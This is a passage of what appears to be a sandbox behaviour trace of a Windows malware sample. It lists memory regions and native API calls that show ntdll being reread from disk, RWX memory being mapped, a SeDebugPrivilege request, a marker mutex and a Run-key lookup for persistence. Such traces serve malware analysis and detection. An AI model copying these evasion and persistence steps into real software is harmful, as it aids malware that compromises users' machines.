0x5fcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bd0000" filename = "" Region: id = 8718 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8719 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8720 start_va = 0x9b0000 end_va = 0xb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 8721 start_va = 0x9b0000 end_va = 0xb30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 8722 start_va = 0xb60000 end_va = 0xb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 8723 start_va = 0x5fd0000 end_va = 0x6154fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fd0000" filename = "" Region: id = 8724 start_va = 0x6160000 end_va = 0x6459fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006160000" filename = "" Region: id = 8725 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8726 start_va = 0x9b0000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 8727 start_va = 0x480000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8728 start_va = 0x480000 end_va = 0x483fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8729 start_va = 0x77620000 end_va = 0x7769afff monitored = 0 entry_point = 0x7763e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8730 start_va = 0x75400000 end_va = 0x75443fff monitored = 0 entry_point = 0x75419d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8731 start_va = 0x76110000 end_va = 0x761bcfff monitored = 0 entry_point = 0x76124f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8732 start_va = 0x74a10000 end_va = 0x74a2dfff monitored = 0 entry_point = 0x74a1b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8733 start_va = 0x74a00000 end_va = 0x74a09fff monitored = 0 entry_point = 0x74a02a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8734 start_va = 0x760b0000 end_va = 0x76107fff monitored = 0 entry_point = 0x760f25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8735 start_va = 0x490000 end_va = 0x4b8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 8736 start_va = 0x4d0000 end_va = 0x4f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 8737 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 8738 start_va = 0x500000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 8739 start_va = 0xab0000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 8740 start_va = 0xb40000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 8741 start_va = 0xb40000 end_va = 0xb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 8742 start_va = 0x6460000 end_va = 0x7fb7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006460000" filename = "" Region: id = 8743 start_va = 0x7fc0000 end_va = 0x81b4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fc0000" filename = "" Region: id = 8744 start_va = 0x81c0000 end_va = 0x83b4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000081c0000" filename = "" Region: id = 8746 start_va = 0xb70000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 8747 start_va = 0x5fd0000 end_va = 0x600ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fd0000" filename = "" Region: id = 8748 start_va = 0x6010000 end_va = 0x603cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006010000" filename = "" Region: id = 8749 start_va = 0x71d60000 end_va = 0x71f6cfff monitored = 0 entry_point = 0x71e4acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 8750 start_va = 0x77810000 end_va = 0x779ccfff monitored = 0 entry_point = 0x778f2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 8751 start_va = 0x759b0000 end_va = 0x759f4fff monitored = 0 entry_point = 0x759cde90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 8753 start_va = 0x6040000 end_va = 0x60e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006040000" filename = "" Region: id = 8762 start_va = 0xb40000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 8763 start_va = 0xb40000 end_va = 0xb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Thread: id = 367 os_tid = 0xd18 [0283.489] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xdf29c | out: HeapArray=0xdf29c*=0x590000) returned 0x2 [0283.507] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xdf24c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.510] NtCreateFile (in: FileHandle=0xdf26c, DesiredAccess=0x120089, ObjectAttributes=0xdf234*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf254, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf26c*=0x88, IoStatusBlock=0xdf254*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0283.520] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x593820) returned 1 [0283.527] NtQueryInformationFile (in: FileHandle=0x88, IoStatusBlock=0xdf254, FileInformation=0xdf1ac, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf254, FileInformation=0xdf1ac) returned 0x0 [0283.534] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1788a0) returned 0x9b7020 [0283.576] NtReadFile (in: FileHandle=0x88, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xdf254, Buffer=0x9b7020, BufferLength=0x1784a0, ByteOffset=0xdf1c4*=0, Key=0x0 | out: IoStatusBlock=0xdf254, Buffer=0x9b7020*) returned 0x0 [0283.598] NtClose (Handle=0x88) returned 0x0 [0283.598] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x17b001) returned 0x5fd8020 [0283.640] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x9b7020) returned 1 [0283.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdf240*=0x0, ZeroBits=0x0, RegionSize=0xdf244*=0x2f9522, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xdf240*=0x6160000, RegionSize=0xdf244*=0x2fa000) returned 0x0 [0283.701] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x594e48 [0283.702] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x595e50 [0283.702] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x596e58 [0283.702] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2000) returned 0x597e60 [0283.704] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x596e58) returned 1 [0283.704] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x3000) returned 0x599e68 [0283.705] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x597e60) returned 1 [0283.705] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4000) returned 0x59ce70 [0283.705] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x599e68) returned 1 [0283.705] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5000) returned 0x596e58 [0283.705] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59ce70) returned 1 [0283.705] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x59be60 [0283.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2000) returned 0x59ce68 [0283.706] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59be60) returned 1 [0283.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x3000) returned 0x59ee70 [0283.706] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59ce68) returned 1 [0283.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4000) returned 0x5a1e78 [0283.706] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59ee70) returned 1 [0283.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5000) returned 0x59be60 [0283.706] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a1e78) returned 1 [0283.707] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x5a0e68 [0283.707] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2000) returned 0x5a1e70 [0283.707] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a0e68) returned 1 [0283.707] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x3000) returned 0x5a3e78 [0283.707] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a1e70) returned 1 [0283.707] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4000) returned 0x5a6e80 [0283.708] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a3e78) returned 1 [0283.708] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5000) returned 0x5a0e68 [0283.708] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a6e80) returned 1 [0283.708] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x594e48) returned 1 [0283.708] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x595e50) returned 1 [0283.708] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x596e58) returned 1 [0283.708] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59be60) returned 1 [0283.708] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a0e68) returned 1 [0283.749] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x594e48 [0283.750] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x595e50 [0283.750] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x596e58 [0283.750] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2000) returned 0x597e60 [0283.750] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x596e58) returned 1 [0283.750] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x3000) returned 0x599e68 [0283.751] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x597e60) returned 1 [0283.752] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4000) returned 0x59ce70 [0283.752] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x599e68) returned 1 [0283.753] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5000) returned 0x596e58 [0283.754] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59ce70) returned 1 [0283.754] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x59be60 [0283.754] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2000) returned 0x59ce68 [0283.754] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59be60) returned 1 [0283.754] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x3000) returned 0x59ee70 [0283.755] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59ce68) returned 1 [0283.755] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4000) returned 0x5a1e78 [0283.755] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59ee70) returned 1 [0283.755] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5000) returned 0x59be60 [0283.755] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a1e78) returned 1 [0283.755] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x5a0e68 [0283.755] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2000) returned 0x5a1e70 [0283.755] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a0e68) returned 1 [0283.756] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x3000) returned 0x5a3e78 [0283.756] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a1e70) returned 1 [0283.756] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4000) returned 0x5a6e80 [0283.756] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a3e78) returned 1 [0283.756] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5000) returned 0x5a0e68 [0283.756] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a6e80) returned 1 [0283.756] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x594e48) returned 1 [0283.756] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x595e50) returned 1 [0283.756] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x596e58) returned 1 [0283.756] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59be60) returned 1 [0283.756] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5a0e68) returned 1 [0283.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xdf1ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.757] NtCreateFile (in: FileHandle=0xdf20c, DesiredAccess=0x120089, ObjectAttributes=0xdf1d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf1f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf20c*=0x88, IoStatusBlock=0xdf1f4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0283.757] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x593820) returned 1 [0283.757] NtQueryInformationFile (in: FileHandle=0x88, IoStatusBlock=0xdf1f4, FileInformation=0xdef68, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0xdf1f4, FileInformation=0xdef68) returned 0x0 [0283.757] NtClose (Handle=0x88) returned 0x0 [0283.757] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x208) returned 0x594e48 [0283.757] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x594e48) returned 1 [0283.764] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x657a11d0, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0xdf228, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0xdf228*(BaseAddress=0x657a1000, AllocationBase=0x657a0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0284.229] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0xdf280, Length=0x2, ResultLength=0x0 | out: SystemInformation=0xdf280, ResultLength=0x0) returned 0x0 [0284.253] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0xdf2a4, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdf2a4, ReturnLength=0x0) returned 0x0 [0284.282] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5fd8020) returned 1 [0284.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdef34*=0x0, ZeroBits=0x0, RegionSize=0xdef38*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdef34*=0x480000, RegionSize=0xdef38*=0x10000) returned 0x0 [0284.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x480000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x480000, ResultLength=0x0) returned 0xc0000004 [0284.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf294*=0x480000, RegionSize=0xdef58, FreeType=0x8000) returned 0x0 [0284.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdef20*=0x0, ZeroBits=0x0, RegionSize=0xdef24*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdef20*=0x480000, RegionSize=0xdef24*=0x20000) returned 0x0 [0284.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x480000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x480000, ResultLength=0x0) returned 0x0 [0284.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf294*=0x480000, RegionSize=0xdf298, FreeType=0x8000) returned 0x0 [0284.323] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdf050 | out: Value="RDhJ0CNFevzX") returned 0x0 [0284.323] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0xdf0c0 | out: BaseAddress=0xdf0c0*=0x77620000) returned 0x0 [0284.346] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xdf2ac | out: TokenHandle=0xdf2ac*=0x98) returned 0x0 [0284.350] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xdf2a0 | out: lpLuid=0xdf2a0*(LowPart=0x14, HighPart=0)) returned 1 [0284.359] NtAdjustPrivilegesToken (in: TokenHandle=0x98, DisableAllPrivileges=0, NewState=0xdf29c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0284.362] NtClose (Handle=0x98) returned 0x0 [0284.362] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdebe0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0284.362] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="14-ARU9T", Value=0xdf08c | out: Value=0xdf08c) returned 0xc0000100 [0284.362] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xde9c0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0284.367] NtOpenDirectoryObject (in: FileHandle=0xdee80, DesiredAccess=0x2000f, ObjectAttributes=0xdee4c*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0xdee80*=0x98) returned 0x0 [0284.369] NtCreateMutant (in: MutantHandle=0xdf0ac, DesiredAccess=0x1f0001, ObjectAttributes=0xdee34*(Length=0x18, RootDirectory=0x98, ObjectName="14-ARU9TUYI8wI3z", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0xdf0ac*=0xb8) returned 0x0 [0284.369] NtClose (Handle=0x98) returned 0x0 [0284.376] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x59aa08 [0284.376] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x59ba10 [0284.376] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x59ca18 [0284.376] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xdecec | out: Value="C:\\Program Files (x86)") returned 0x0 [0284.383] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdf064, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.385] NtCreateFile (in: FileHandle=0xdf084, DesiredAccess=0x120089, ObjectAttributes=0xdf04c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf06c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf084*=0x98, IoStatusBlock=0xdf06c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0284.385] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5918e0) returned 1 [0284.389] NtQueryInformationFile (in: FileHandle=0x98, IoStatusBlock=0xdf06c, FileInformation=0xdefc4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf06c, FileInformation=0xdefc4) returned 0x0 [0284.389] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x41765) returned 0x59da20 [0284.398] NtReadFile (in: FileHandle=0x98, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xdf06c, Buffer=0x59da20, BufferLength=0x41365, ByteOffset=0xdefdc*=0, Key=0x0 | out: IoStatusBlock=0xdf06c, Buffer=0x59da20*) returned 0x0 [0284.402] NtClose (Handle=0x98) returned 0x0 [0284.402] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdf054, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.402] NtCreateFile (in: FileHandle=0xdf074, DesiredAccess=0x120089, ObjectAttributes=0xdf03c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf05c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf074*=0x98, IoStatusBlock=0xdf05c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0284.402] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5918e0) returned 1 [0284.402] NtQueryInformationFile (in: FileHandle=0x98, IoStatusBlock=0xdf05c, FileInformation=0xdefb4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf05c, FileInformation=0xdefb4) returned 0x0 [0284.402] NtClose (Handle=0x98) returned 0x0 [0284.402] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdf084, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.402] NtCreateFile (in: FileHandle=0xdf0a4, DesiredAccess=0x120089, ObjectAttributes=0xdf06c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf08c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf0a4*=0x98, IoStatusBlock=0xdf08c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0284.403] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5918e0) returned 1 [0284.410] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xdec84 | out: TokenHandle=0xdec84*=0xbc) returned 0x0 [0284.414] NtQueryInformationToken (in: TokenHandle=0xbc, TokenInformationClass=0x1, TokenInformation=0xde47c, TokenInformationLength=0x400, ReturnLength=0xdec7c | out: TokenInformation=0xde47c, ReturnLength=0xdec7c) returned 0x0 [0284.415] ConvertSidToStringSidW (in: Sid=0xde484*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xdec80 | out: StringSid=0xdec80*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0284.415] NtClose (Handle=0xbc) returned 0x0 [0284.418] NtCreateKey (in: KeyHandle=0xdf0bc, DesiredAccess=0x20219, ObjectAttributes=0xde610*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdf0bc*=0xbc) returned 0x0 [0284.421] NtEnumerateValueKey (in: KeyHandle=0xbc, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde864, Length=0x200, ResultLength=0xdec64 | out: KeyValueInformation=0xde864, ResultLength=0xdec64) returned 0x0 [0284.421] NtClose (Handle=0xbc) returned 0x0 [0284.433] SetErrorMode (uMode=0x8003) returned 0x1 [0284.436] NtCreateSection (in: SectionHandle=0xdeccc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xdea4c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xdeccc*=0xbc) returned 0x0 [0284.441] NtMapViewOfSection (in: SectionHandle=0xbc, ProcessHandle=0xffffffff, BaseAddress=0xdecd0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea4c*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xdecd0*=0x490000, SectionOffset=0x0, ViewSize=0xdea4c*=0x29000) returned 0x0 [0284.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 